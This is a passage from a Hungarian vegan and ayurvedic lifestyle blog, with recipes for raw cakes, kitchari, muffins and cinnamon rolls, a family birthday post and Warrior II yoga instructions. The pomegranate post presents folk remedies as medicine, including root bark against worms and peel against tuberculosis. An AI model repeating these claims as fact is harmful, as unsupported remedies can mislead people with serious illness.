megtisztítjuk. Levágjuk a száraz végeit és vékonyan lehúzzuk a rózsaszínes héjat. Megmossuk, majd kb. 0,5 cm széles szeletekre vágjuk. Megmossuk és kicsumázzuk az epret, majd felkarikázzuk kb. 0,5 cm széles szeletekre. Az így elkészült rebarbarát és epret ö sszekeverjük a 70 g kókuszcukorral. Kiveszünk ebből a cukros gyümölcsös tálból egy bögrényit, amit leturmixolva, pépként visszaborítunk a feldarabolt csümölcsökhöz. Alaposan összekeverjük. Így egy szaftos, de mégis gyümölcsdarabos "krémet" kapunk. Hozzáadunk 2 ek zabpelyhet, elkeverjük, majd hagyjuk állni egy 15 percet. A megpihent tésztagombócból lecsipünk egy kisebb ökölnyit, és félretesszük. A többi tésztát pedig egy sütőpapírral kibélelt tepsibe nyomkodunk úgy, hogy egy kis pereme is legyen a tésztának. 180°C-ra előmelegített sütőben 10 perc alatt elősütjük a süti alsó részét. Miután elősült, kivesszük a sütőből, ráborítjuk a cukros-epres-rebarbara tölteléket, majd a tetejét "megszórjuk" a félretett és lecsipett tésztával. epres-rebarbarás zabsüti (laktózmentes, gluténmentes, tojásmentes, vegán) Visszatoljuk az egészet a sütőbe és kb. 30 perc múlva már kész is. Mennyei illatok fogják jelezni a süti elkészültét. Fogyaszthatjuk melegen, de akkor nem lesz könnyen vágható, vagy hagyjuk kihűlni (esetleg hűtőben dermedni), és akkor szépen szeletelhető lesz a sütemény. (Én előző nap szoktam elkészíteni, éjjelre beteszem a hűtőbe. Reggel csak fel kell kicsit melegíteni, és már fogyasztható is.) Mennyivel jobb egy ilyen reggeli, mint egy sápadt szendvics, nemde? ;-) Jó étvágyat hozzá! ;-) epres-rebarbarás zabsüti (laktózmentes, gluténmentes, tojásmentes, vegán) TÁPLÁLKOZZ, NE CSAK ÉTKEZZ! :-) Megjegyzés: "100 g rebarbara mindössze 16 kilókalóriát tartalmaz. Hasznos növényi rostokat, tartalmaz, továbbá értékes cseranyagokat, flavonoidokat, polifenolokat. A vitaminok közül pedig bőségesen van benne A-, B1-, B2- és C-vitamin és niacin. Ásványi anyagai közül kiemelkedően sok kálium, kalcium, foszfor, magnézium, vas és szelén benne." Bővebben a rebarbaráról a Házipatika oldalán olvashattok. epres-rebarbarás zabsüti (laktózmentes, gluténmentes, tojásmentes, vegán)
A harmadik születésnapi torta
Hihetetlen, de újra eltelt egy év! Április 30-án Ádi három éves lett! Ahogy minden eddigi szülinapjára, most is piknikkel készültem és mivel a szülinap most szombatra esett, egyértelmű volt, hogy a biopiacon fogjuk megtartani a piknikezős-játszóterezős-dumcsizós bulit családtagokkal és néhány baráttal.
Előtte pénteken egész nap a konyhában sürögtem-forogtam, hogy minden készen legyen másnapra… hála a szüleimnek, akik vállalták a srácok felügyeletét és két szoptatás között igyekeztem mindig minél több mindent megcsinálni. Természetesen a tortát titokban csináltam, akkor, amikor teljesen egyedül voltam, aztán gyorsan bedugtam a mélyhűtőbe, hogy az ünnepelt ne láthassa másnap délelőttig.
Nyers tortát készítettem. Meg akartam hagyni a csokoládés ízvilágot, mint az első és a második tortánál, de vittem bele egy kis gyümölcsösséget málnával, mert Ádi imádja a málnát, meg a többi bogyós gyümölcsöt is (eper, áfonya, ribizli). Eredetileg márvány tortának terveztem, gondoltam, hogy a két ízt összeöntöm és márványosan összekeverem, de mivel a krém nem lett olyan híg, mint gondoltam, így inkább rétegeztem a tortát, és lett belőle egy nyers málnás-csokoládés “sajttorta” (cheesecake). Nagyon jól passzol a savanykás málna réteg a kesernyés csokival és az édeskés alappal.
Az ünnepelt Ádi pedig igazi kiskrapekká cseperedik. Hihetetlen beindult a dumálókája. Ilyeneket mond: “Hm, úgy gondolom, hogy most nem megyek veled a boltba!” vagy a másik cuki dolog: “Anya, ebben (mosógép) vagy van mosópor vagy nem.” – ilyen vagy-vagyos mondatokat mond sokszor és egy három évesnek megfelelően sokkal logikusabban használja a magyar nyelvet, nem mindig a “nyelvtani szabályoknak megfelelően”, mint mi felnőttek. Néha ledöbbenünk, hogy mennyi mindent lát, észrevesz, tapasztal a világból. Fantasztikus a humora, a memóriája, nagyon ügyesen megtanult rollerezni és imádja (gyömöszölni) a kisöccsét.
Boldog születésnapot kisfiunk! Nagyon-nagyon szeretünk téged! Anya, Apa és Ákos
“Három éves lettem!”
Nyers vegán málnás-csokoládés sajttorta
Hozzávalók (egy 18 cm-es kapcsos formához):
Alaphoz:
– 1 bögre mandula
– 1 és 1/2 bögre friss datolya, kimagozva (aszalt is jó, csak érdemes használat előtt egy fél órára langyos vízbe beáztatni, hogy könnyebben aprítsa a robotgép)
– 1/4 teáskanál Himalaya só
Alap krémhez:
– 2 bögre kesudió, vízben áztatva 4-5 órán (vagy egy éjszakán) át, majd leszűrve
– 1/3 bögre nyers extra szűz kókuszzsír (jó, a nem nyers extra szűz változat is, az nem kókusz ízű)
– 1/3 bögre juharszirup
– 1 vaníliarúd kikapart magjai
Málnáshoz:
– 1/2 alap krém
– 3/4 bögre fagyasztott málna
– 1 evőkanál frissen facsart citromlé
– 4 evőkanál víz
Csokoládéshoz:
– 1/2 alap krém
– 2 evőkanál nyers kakaópor
– 2 evőkanál karobpor (lehet csak kakaóval vagy csak karobbal készíteni)
– 1 evőkanál kesudióvaj
– 10 evőkanál zabtej (bármilyen növényi tej használható)
– csipet só
(A recepthez használt bögre 250 ml-es.)
Tegyük a mandulát a robotgépbe és aprítsuk szemcsésre. Ekkor adjuk hozzá a datolyát és sót és dolgoztassuk a gépet addig, amíg a torta alapunk összeáll tésztává. A tortaformát béleljük ki folpackkal vagy kenjük ki kókuszolajjal és nyomkodjuk az aljába a datolyás mandulás keveréket, majd tegyük a mélyhűtőbe megkeményedni, amíg elkészítjük a többi réteget. Mossuk el a robotgép tartályát.
A krém elkészítéséhez szűrjük le a vizet a kesudióról. Tegyük a kesut a kókuszzsírral, a juharsziruppal és vaníliával a robotgépbe és kezdjük el pürésíteni. Ha teljesen sima, akkor vegyük ki a krém felét és tegyük félre. A robotgépben maradt fél krémhez adjuk a málnát, a citromlevet és vizet, pürésítsük simára, majd kanalazzuk az alapra és tegyük vissza a hűtőbe. Mossuk el a robotgép tartályát.
Tegyük a robotgépbe a maradék fél krémet, adjuk hozzá a kakaóport, a karobport, a kesudióvajat, zabtejet és sót. Pürésítsük simára, majd kanalazzuk a málnás krémre. Tegyük a mélyhűtőbe a tortát néhány órára, amíg megszilárdul, szeletelhetővé válik, de nem túl kemény.
Kitri (más néven kitchari) - az ájurvédikus gyógyító étel
2016. május 1. Élj harmóniában
Kitchari (kitri) - az ájurvédikus gyógyító ételA kitri egy indiai gyógyító egytálétel, amit mung babból és baszmati rizsből készítenek. Ez az igazán egészséges étel, ízletes, nagyon tápláló és könnyen emészthető - az ájurvédikus életmódnak nélkülözhetetlen része . A rizs és a mung bab is édes és hűsítő minőségűek az ájurvéda szempontjából. A rizs és mung bab együtt, teljes értékű fehérjével látja el a szervezetedet és minden ájurvédikus testtípus számára kedvezően hat. Ez az egyszerű egytálétel a test minden szövetét táplálja. Az ájurvédában a legtöbb betegség esetén és a különböző tisztító kúrákban alkalmazható a kitri diéta, hogy helyreállítsd vele szervezeted egyensúlyát.A kitri nagyon jó energiával látja el a szervezeted és fiatalító hatású. A fűszerezését kedvedre tudod variálni, így igazán változatos és ennek köszönhetően, sosem lehet megunni:) A fűszerezést ájurvédikus testalkatodnak megfelelően össze tudod állítani. Nagyon sok kitri receptet találsz az Interneten. Többféle hozzávalóról (sárgaborsó, lencsefélék) és elkészítési eljárásról olvashatsz. Az eredeti ájurvédikus kitri mungó babbal és baszmati rizzsel készül - és nem tartalmaz zöldségeket. Fontos alapszabály még, hogy a hozzávalókat egybe főzzük meg - találsz olyan recepteket ahol külön, külön megfőznek mindent és után csak összerakják, de az valójában nem tradicionális ájurvédikus kitri - az csak különböző fogások egy tányéron. Az arány általában 1:1, de ez változtatható a testtípus szerint pl gyengébb emésztésű vata-knak kétszer annyi rizs ajánlott. A fűszerezés van ahol az elején kezdik azzal és együtt főzik az étellel és van ahol a végén utólag teszik hozzá. Én dr. Vasant Lad elismert ájurvédikus orvos által preferált recepteket szoktam használni - ő elég hiteles forrás:) ő az elején teszi bele a fűszereket és egybe főzi az egészet. Hozzávalók 1 csésze baszmati rizs 1 csésze mung bab 3 ek. ghí 1 tk. fekete mustármag 1 ujjnyi friss gyömbér megtisztítva és apróra vágva) 1 tk. római kömény 2 csipetnyi asafoetid (hing) 1/2 tk. kurkuma 1/2 tk. só 4-5 csésze víz Vegyszermentes (bio) alapanyagokat használj! A rizst és a mung babot mosd meg. Ha van egy kis időd néhány órára főzés előtt beáztathatod a mu ng babot - ez segíti az emésztést. Ha nagyon nehezen emészted a babféléket akkor előfőzheted egy kicsit a mn babot - de igazából erre nagyon keveseknek van szüksége. Egy edénybe közepes lángon melegítsd fel a ghít , majd add hozzá a mustármagot - hagyd kipattogni (le is veheted ilyenkor a tűzről, nehogy a többi fűszer megégjen amikor majd belerakod. Majd add hozzá a római köményt, a hinget és a gyömbért szó rd hozzá a kurkumát és gyorsan teheted is rá a rizst és a mung d halt. majd keverd jól össze, hogy a rizs és a maung jól összekeveredjenek a fűszerekkel. Add hozzá a vizet és forrald fedő nélkül 5 percig. Aztán vedd takarékra és a fedő t tedd rá éppen csak egy pici rést hagyva a gőznek. Főzd amíg meg nem puhul - kb. 25 perc. E z mindegyik dósa számára fogyasztható kitri recept, de különösen vata-k számára megfelelő.
Ribizlis muffin (vegán)
Ismered a muffinos embert? Do you know the muffin man? - kérdezi az angol gyerekdal immár majdnem 200 éve. Régen, az 1800-as évek tájékán ugyanis muffin man-ek járták a városok utcáit, édes és sós süteményeket árulva. Abban az időben a muffin nem azt jelentette, mint napjainkban. Sokkal inkább kelt (élesztős) tésztájú sós étel volt, amit pl. kenyértésztából készítettek. Az édes, kevert süteményes változatok elterejdése már inkább amerikai történet, s a cupcake-k színes világa által vált ismerté. (Cupcake-k muffinhoz hasonló sütemények, melyek lapost tetejét máz és színes cukorkák díszítik.) Most következzen egy gyors ribizlis muffin recept, ami segíthet, hogy a fagyasztóban pihenő ribizliszemeket hogyan használd fel. Mivel gyorsan összekeverhető, a sütés sem tart sokáig, így 30 perc alatt kész is a sütemény, akár gyerekzsúrra, akár felnőtteknek, vagy csak úgy, a családnak, hétvégére. A recept: Hozzávalók: 25 dkg liszt (10 dkg teljes kiőrlésű, 15 dkg fehér liszt) - 12 dkg gyümölcscukor vagy nyírfacukor vagy xylit - 1 vanília kikapart belseje - 1-2 csipet kurkuma (elhagyható, de szép sárga színe lesz, mintha tojással készült volna) - 1 csapott teáskanál szódabikarbóna - 12.5 dkg margarin (vegán, ha lehet) vagy folyékony kókuszzsír 0.5 dl víz vagy növényi tej (lehet kevesebb is elég, sűrű tészta legyen) 1 bögre ribizli (leszemezve; ha fagyasztott, nem szükséges felolvasztani) muffinpapírok Elkészítés: Egy keverőtálba szórjuk a lisztet, a gyümölcscukrot, a kikapart vanília belsejét, a kurkumát és a szódabikarbónát. Összekavarjuk őket, s közepébe egy mélyedést teszünk, ebbe kerül az olvasztott margarin vagy kókuszzsír. Elkezdjük fakanállal összekeverni és annyi vizet vagy növényi tejet adunk hozzá, amennyit felvesz úgy, hogy sűrű, nem folyékony tésztát kapjunk. Amikor a tészta kész, hozzákeverjük a ribizlit, majd a muffinpapírokkal kibélelt muffinsütő-formába kanalazzuk a tésztát. A tetejére is szórhatunk pár szem ribizlit. Közepes tűznél kb. 20 percig sütjük, tűpróbával ellenőrizzük. Ha a tészta ráragad, még nem jó.
Kókuszos szelet eperrel (nyers)
Ezt a süteményt nem egyszerűen jó falatozni, de igen egészséges is. Bizonyítéka, hogy a nyers táplálkozás során is fogyaszthat az ember süteményt, édességet, nem csak füvet legel. :) Ha van még a fagyasztóban elfekvőben némi eper, a következő süteményt feldobhatod vele (amúgy nélküle is elkészítheted). De ha éppenséggel eperbefőttet szeretnél használni, az is megfelel. Szintén korábban elkészített recept következik, amihez eperbefőttet használtam, amit nem én tettem el. (Inkább fagyasztva teszem el.) Valamilyen társasági alkalomra vittem, s meglehetősen gyorsan elkapkodták a tálcáról az emberek. Nyers sütemény, így igazán egészséges, és mivel tömény (olajos magvak és kókusz alkotják a nagy részét), nem tud belőle sokat enni az ember. Viszont nem kell sütni, gyorsan elkészülsz vele.
A recept:
Hozzávalók:
- 15 dkg olajos mag
- 8-10 szem datolya vagy ennek megfelelő mazsola vagy aszalt szilva
- útifű maghéj (2-3 kanál, de ha túl folyékony, többet is felvehet)
- 12 dkg kókuszreszelék
- víz
- méz/banán/szirup
- kókuszzsír vagy kakaóvaj (3-4kanál)
- kakaópor vagy karobpor
- folpack
- eper (friss, fagyasztott vagy befőtt)
Elkészítés:
Az alap: az olajos magvakat jó alaposan megdaráljuk. (Lenmagot, diót használtam leginkább, de elkészíthető mandulával is.) A datolyát felaprítjuk, meleg vízbe beáztatjuk, majd ha felpuhult, a vizet leszűrjük róla és gyorsraprító gépben pépesre daráljuk. Ezt hozzákeverjük az olajos mag őrleményhez. Egy kevés vizet adunk még hozzá, majd előveszünk egy tortaformát vagy egy tepsit/tálcát és folpackkal kibéleljük. Ezután az aljába nyomkodjuk a nyers tésztát. Hűtőbe tesszük.
Kókuszos krém: A kókuszreszelékeket felöntjük annyi vízzel, hogy épp ellepje. Kicsit átforgatjuk kanállal. Mikor ázott egy rövid ideig, a turmixgépbe tesszük. Attól függően, hogy banánnal vagy mézzel édesítjük, azt is teszünk hozzá (banánt felkarikázva). Indulhat a turmixolás. (Ezt nehezebben viszi valamivel a turmixgép.) Amikor láthatóan összeturmixolódott, ehhez is adunk kb. 2-3 evőkanálnyi útifű maghéjat. Zselés, habos állagot ad neki.
A kókuszos krémet elsimítjuk a sütemény alapján. Hűtőbe tesszük.
Csokimáz : Folyékony kókuszzsírt (vagy kakaóvajat) kikeverünk karob vagy kakaóporral, mézet és/vagy biocsicsóka sűrítményt/ agavé vagy datolya szirupot/ mézet keverünk hozzá. Ezt a kókuszos réteg tetejére simítjuk. Érdemes ezt követően rögtön felszeletelni, a szeletek tetejére egy-egy szem epret tenni és utána hűtőbe tenni, hogy dermedjen egy-két órán keresztül.
Gyümisali
2016. április 29. Nyers konyha
Szeretem a reggelt édes gyümölcsökkel kezdeni! Kedvencem a turmix, de van hogy kedvem van rágcsálni kicsit. Iyenkor vagy megeszem a gyümölcsöt úgy ahogy van, vagy készítek egy gyümisalit. Most simán lereszeltem egy almát, elkevertem vaníliával, fahéjjal, megszórtam, kókusszal, kivivel, fagyasztott erdei gyümölccsel és goji bogyóval. Persze a virágok is ehetők! Alig várom, hogy mehessek futni az erdőbe. Tegnap is szemerkélő esőbe indultam este, de megérte, úgy feltölt a friss levegő, a természet. Egyik nap még tehenekkel is találkoztam, az egyik megpuszilta a kezem...szeretem az állatokat, legszivesebben jól megdögönyöztem volna a bundáját!
A gránátalma hatásai
2016. április 26. Élj harmóniában
A gránátalma egy csodás hatásokkal rendelkező gyümölcs. Ille tve nem csak a gyümölcse, de az ájurvédában a gyökér kérgét és a gyümölcs héját is felhasználják. Hatással van az emésztésre, keringésre. Hatásait tekintve összehúzó, erősítő, vértisztító, fereghajtó, vérzés csillapító, gyomorerősítő. A gránátalmafa gyökerének kérge f érgesség esetén nagyon hatékony, orsóféreg, fonalféreg és galandféreg ellen használható. Párlat formájában kell megfelelő ideig alkalmazni a kúrát és kiegészítésként szegfűszeget használnak. A gyümölcs héja jó gyulladásgátló és összehúzó hatással rendelkezik, kedvezően hat a nyálkahárytákra. Torokgyulladásnál, bronchitisnél és tuberkulózisban is alkalmazható. A gyümölcs héjának porát fehér folyás ellen irrigálásra alkalmazzák. Masszát is lehet készíteni a gyümölcs héjának porából és k ülsőleg sebekre, fekélyekre, aranyérre használható. Leve k iváló gyomorerősítő , fahéjjal, szegfűszeggel. Jótékony hasmenés esetén, vastagbélgyulladásnál is. Székrekedés esetén ne alkalmazd! Édes változata m indhárom dhosának kedvező, a savanyú változat növeli a P ittat. Felhasznált szakirodalom:dr. David Frawley és dr. Vasant Lad: Gyógynövény jóga
Nyers vegán tejszínes epertorta
2016. április 23. Vegán lettem
A hűs, nyers vegán tejszínes epertorta minden nyári családi összejövetel tuti nyerő édessége lesz.
Az édességeknek és a tortáknak nem kell mindenféleképpen hízlalónak és egészségtelennek lenniük. Sőt, a torta lehet frissítő és tápanyagban dús, ha a megfelelő alapanyagokból állítjátok össze. Lássuk, hogy a Szépségkonyha milyen recepttel szolgál nektek.
Nyers vegán tejszínes epertorta hozzávalók
A tortaalaphoz:
150g csíráztatott hajdina kiaszalva (ennek hiányában kókuszreszelék)
200g áztatott datolya
kakaópor ízlés szerint
aszalt gyümölcsök ízlés szerint
A tortakrémhez:
300g áztatott kesudió
200g kókuszolaj (erősen ajánlott a szűz) vagy kakaóvaj
400g friss eper, tegyünk félre szép piros eperszemeket a díszítéshez (szezonon kívül használhatsz mirelit színes, bogyós gyümölcsöket is)
5-10g konjac liszt
100g datolyapép
ízlés szerint vanília
Nyers vegán tejszínes epertorta elkészítése
Készítsd el elsőnek a tortaalapot. A kicsíráztatott és leaszalt hajdinát őröld le. Ha nincs otthon csíráztatott hajdinád, akkor használhatsz kókuszreszeléket is helyette. A beáztatott datolyát nyomkodd ki, majd pépesítsd aprítógéppel vagy bármilyen erre alkalmas konyhai eszközzel. Gyúrd formázhatóra egy tálban a két összetevőt, majd ízlés szerint kakaóporral színezd és gazdagítsd aszalt gyümölcsökkel. Az elkészült masszát nyomkodd bele egy sütőpapírral kibélelt tortaformába és tedd félre.
Mikor a fentiekkel megvagy jöhet a tortakrém. A kókuszolajat aszalóban vagy meleg helyen olvaszd meg. Egy turmixgépbe önts fél liter vizet, öntsd mellé a kesudió felét a datolyapéppel, majd turmixold össze a vaníliával és a kókuszolajjal. Ezután add hozzá a maradék kesudiót, turmixold össze csomómentes, folyékony krémmé. Ha az eredményt túl sűrűnek találod, akkor állítsd be az állagát kevés vízzel. A turmixolt krém felét öntsd a tortaalapra, majd tedd a fagyasztóba a tortaformát. A kehelyben maradt krémhez add hozzá az epret, valamint a megmaradt kókuszolajat és turmixold össze. A massza sűrűségét konjac liszttel állítsd megfelelőre. Az így elkészült epres krémet öntsd a fehér krémre és dolgozd el, majd tedd vissza a tortaalapot a fagyasztóba 2-3 órára dermedni.
Tálaláskor a félretett eprekkel díszítsd és vizes, vékony pengéjű késsel szeleteld.
Jó étvágyat kíván hozzá a Szépségkonyha!
1 éves a blog :)
2016. április 18. Élj harmóniában
Pontosan 1 éve, 2015. április 18-án indítottam el Nektek, Értetek az Élj harmóniában blogot. Évekig kértétek, hogy legyen egy ilyen hely, ahol közreadok recepteket, életmóddal, jógával, ájuvédával, táplálkozással kapcsolatos hasznos információkat. A blog 1 éves látogatottsága arra utal, hogy valóban jó volt elindítani és sok minden hasznos dolgot közzé tenni. Örültem annak, hogy nem csak a receptek népszerűek, de sokan olvassátok a nagyobb lélegzetvételű szakmaibb írásokat, jógás, ájurvédás, gerincterápiás cikkeket is:) Köszönöm, hogy az elmúlt 1 évben látogattad a blogot, rendszeresen olvastad:) Remélem hozzá tudtam járulni ahhoz, hogy egészségesebben, kiegyensúlyozottabban élj, fejleszthesd a tudatosságodat és könnyeben tudd beépíteni a hétköznapi életedbe az egészséges életmód alapelveit. Továbbra is nagy szeretettel és lelkesedéssel folytatom amit elkezdtem egy évvel ezelőtt. Hiszek benne, hogy tudás egy olyan dolog, amit ha megosztunk másokkal nekünk sosem lesz belőle kevesebb, viszonyt másoknak sokat tudunk segíteni, javítani akár az életminőségükön. kívánok egészséget és harmóniát sok szeretettel : Kati
Kakaós és nutellás csiga kicsit másképp
2016. április 15. Éltető ételek
Már van az oldalamon egy kakaós csiga recept, ami eredetileg az anyósom receptje volt. Bár kissé meg kellett reformálni, hogy tej- és tojásmentes legyen. Ez a mostani recept egy kicsit vajasabb, és a különleges dagasztásnak köszönhetően igazán laza lett a tésztája annak ellenére, hogy teljes kiőrlésű lisztből készült. Ebből a tésztából nemcsak csigákat készíthetünk, hanem kockára vagy háromszögre szeletelve megtölthetjük lekvárral, vagy diós töltelékkel. A dagasztás ötletét a "Hogyan süssünk kenyeret" című könyvből vettem. Érdemes megvenni, hamarosan írok erről egy könyvajánlót. ... és akkor most jöjjön a recept. Hozzávalók: - 45 dkg teljes kiőrlésű tönkölyliszt - 25 dkg fehér tönkölyliszt - 3-4 dkg élesztő - 15 dkg bio vaj - 10 dkg méz (ha nem szirup állagot teszel bele, pl. kókuszvirágcukor, akkor több folyadékot fog igényelni) - 1 teáskanál himalája só - 3 dl rizstej Nutellás töltelék: Rapunzel "Szamba" mogyorókrémkókuszkrém Kakaós töltelék: - 4 teáskanál kakaópor - 8 teáskanál kókuszvirágcukor - 3 dkg puha, bio vaj - kókuszkrém (amennyi kell, hogy kenhető legyen) Elkészítése: A lisztet tegyük egy tálba, és csináljunk a közepére egy mélyedést.A tejet langyosítsuk meg.Morzsoljuk a liszt közepébe az élesztőt, adjunk hozzá 1 kávéskanál mézet, és öntsünk rá kb. 1 dl langyos tejet.Keverjük össze úgy, hogy a körülötte lévő lisztből is beledolgozunk, de csak annyit, hogy egy lágy massza legyen. Fedjük le, és hagyjuk 10 percig pihenni. Ezalatt az élesztő felfut.Keverjük össze a tésztát, de csak annyira, hogy összeálljon a tészta. Ismét 10 perc pihentetés, lefedve!A tészta széleit húzzuk felfelé, majd nyomjuk bele a közepébe. Fordítsunk picit a tálon, és ismételjük meg a mozdulatot. Tehát forgassuk teljesen körbe a tálat, és 8-10 mozdulattal felhúzzuk a tészta széleit a közepére. Ennyi a dagasztási folyamat.Lefedve, 10 percig pihentessük.Ismételjük meg a dagasztási folyamatot és a pihentetési fázist még kétszer.Még egy dagasztási folyamat, majd lefedve pihentessük 1 órát.Ezidő alatt a duplájára kelt. Ököllel megcsapkodva üssük ki belőle a levegőt.Osszuk a tésztát 3 részre. Nyújtsuk ki egy nagy téglalap alakúra. Kenjük meg a töltelékkel és tekerjük fel.Szeleteljük fel, és tegyük a tepsibe. Ismét pihentessük úgy 35-45 percet.Közben melegítsük elő a sütőt 180 fokra.Ha letelt az idő, tegyük be a sütőbe. Kb. 30 perc elteltével kenjük meg a tetejét langyos, vaníliás tejjel.Tegyük vissza a sütőbe úgy 5 percre. Ennyi! Jó étvágyat!
Tégy a gerinced egészségéért! - Vírabhadrászana 2. (Harcospóz 2.)
2016. április 13. Élj harmóniában
Vírabhadrászana 2. (Harcospóz 2.)A harcos pózok, vagy más néven hősi pózok a fizikai test szintjén megerősítik a stabilizáló izmokat - erősítik a láb izomzatát, medence körüli izomzatot, mély hátizmokat. A hősi pózok fejlesztik a magabiztosságot , határozottságot, önbizalmat kitartást. Vírabhadrászana 1.-ről (Harcospóz 1 .) részletesen egy korábbi bejegyzésben itt olvashatsz. Vírabhadrászana 2 . (Harcospóz 2 .) szintén erősíti a láb izomzatát, b okákat és a térd körüli izomzatot, combokat - segít helyreállítani a talpboltozati rendellenességeket és sokat segíthet a térd problémáknál is. Ez is egy kiváló tartásjavító jógapóz, mert erősíti a stabilizáló izmokat. A hősi póz 2 oldja a medence merevségét, serkenti az alhasi szervek működését. E rősíti a szívet, javítja a keringést. Kiváló gyakorlat nők számára is, mert az alsó két csakrával dolgozik elsődlegesen. A combon és csípőtájékon lerakódott feleslegtől is segít megszabadulni. Mellkasnyitó hatásának köszönhetően serkenti a tüdő munkáját is. A nyak és vállöv megfelelő munkájával jól kompenzálja, az ülő munka és a görnyedés következtében kialakult erőlehelyezett fejtartást. Hogyan végezd el? - Állj meg összezárt lábakkal - Tádászanában (hegytartásban) - Lépj hátra egy nagy terpeszbe - és a lábaid középső tengelye legyen párhuzamos egymással. - A jobb lábfejedet fordítsd el teljesen (kb. 90 fok) majd a bal lábfejedet is fordítsd el kicsit jobbra (kb. 40-45 fok) úgy hogy a sarkad hátrébb kerüljön mint a lábujjaid. - A jobb lábad sarkától, ha húzol egy képzeletbeli vonalat kb. a bal lábfejedet középen metszi. - Majd hajlítsd be a jobb térded - ha tudod annyira menj mélyre, hogy a combod párhuzamos legyen a talajjal. A lábszárad legyen merőleges a talajra és a térded a bokád fölé kerüljön. - A medencédet és a mellkasodat ne fordítsd el a jobb láb irányába, továbbra is nézzen előre. - A medencédet tartsd stabilan - aktív a hasizom, farizom. és nyújtóz z hosszan az egész gerinceddel fölfelé. - Emeld minkét karod a oldalsó középtartásba, a két kar legyen egymás folytatása. - M ajd fordítsd el a fejeld a jobb kezed irányába. Kijövetel a pózból kilégzéssel engedd le a karokat, majd nyújtsd a térded. Forgasd be a lábfejeket középre és végezd el a gyakorlatot a másik oldalra is. A gyakorlat végén a kiindulási pózban (hegytartásban) pihenj meg. A kitartás alatt tartsd stabilan a lábaidat, nyomd a külső talpéleket és a nagylábujjad tövét a talajba és próbáld megtartani a bel boka területét. A két lábadon egyformán próbáld elosztani a testsúlyodat. Figyelj rá, hogy a térded ne billenjen befelé - végig maradjon a bokád fölött. A hátul lévő lábad külső talpélét próbáld lenyomni a matracba és ebből a letolásból próbáld meg a hátsó lábad combját, hátrafelé csavarni, ez segít majd a csípődet nyitni. Figyelj nagyon, hogy az elől lévő térded ne billenjen el a boka fölül. A lapockáidat húzd befelé és lefelé a hátadba, mintha egy diót szeretnél összetörtni a két lapockád között. A vállakat gördítsd hátrafelé lefelé, távolítsd el a fülektől. Tartsd mindkét kezed nyújtva és aktívan nyújtózkodj a kézujjakkal is. Ha a combod még nem bírja, akkor ne menj annyira mélyre a pózba. Törekedj rá, hogy a z arc, mellkas, medence előre nézzen. A törzsedet tartsd stabilan és szegycsonttal és fejtetővel nyújtózz fölfelé. A hasadat, derék táji szakaszt, medencédet tartsd végig stabilan.Húzd b e a leng őbordákat is, figyelj rá ne emeld ki a bordakosarad. A picit behúzott farokcsontb ól nyújtózz az egész gerincoszloppal folyamatosan. Belégzéssel próbálj nyújtózni fejtetővel, szegcsonttal, nyisd a mellkast (távolítsd a kulcscsontokat egymástól), kilégzéssel próbáld a combokat hátrafelé csavarni, ez segít nyitni a csípődet, told a talpakat a talajba és a válladat görgesd hátrafelé, lefelé, hogy a lapockák alsó csücskei közelítsenek egymáshoz. - úgy dolgozz, ahogy Tádászanában (A tádászanáról itt olvashatsz). Ne végezd a jógapózt, amennyiben szívproblémád vagy tüdőtágulatod van és kezeletlen m agas vérnyomás esetén